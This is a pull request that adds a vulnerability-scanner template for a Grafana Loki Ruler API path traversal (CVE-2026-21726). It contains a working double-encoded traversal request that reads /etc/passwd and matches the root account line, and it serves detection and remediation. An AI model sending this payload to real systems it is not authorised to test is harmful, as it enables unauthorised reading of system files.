### PR TITLE
Add CVE-2026-21726 template

### DIFF
--- a/http/cves/2026/CVE-2026-21726.yaml
+++ b/http/cves/2026/CVE-2026-21726.yaml
@@ -1,0 +1,47 @@
+id: CVE-2026-21726
+
+info:
+  name: Grafana Loki < 3.6.4 - Ruler API Path Traversal
+  author: str4k3r
+  severity: medium
+  description: |
+    Grafana Loki before 3.6.4 decodes the Ruler API namespace twice before
+    joining it to the local rule-store path. A double-encoded traversal
+    therefore escapes the rules directory and the YAML parser includes the
+    selected file in its error response. This unauthenticated probe requests
+    the standard /etc/passwd file and matches the root-account record; it does
+    not write data or use credentials.
+  impact: An unauthenticated attacker can read files accessible to the Loki process.
+  remediation: Upgrade Grafana Loki to 3.6.4 or later.
+  reference:
+    - https://grafana.com/security/security-advisories/cve-2026-21726
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-21726
+    - https://github.com/advisories/GHSA-497x-rrr9-68jp
+  classification:
+    cve-id: CVE-2026-21726
+    cwe-id: CWE-22
+    cvss-score: 5.3
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: grafana
+    product: loki
+    technology: Go, Grafana Loki, gorilla/mux
+  tags: cve,cve2026,grafana,loki,lfi,path-traversal,unauth
+
+http:
+  - raw:
+      - |
+        GET /loki/api/v1/rules/..%252f..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 400
+      - type: word
+        part: body
+        words:
+          - "root:x:0:0:"


### PR DESCRIPTION
## Verification

This re-authors the verified Loki lab probe as a real vulnerability check: it
uses the unauthenticated double-encoded Ruler traversal and matches the
standard `/etc/passwd` root record. It performs no write.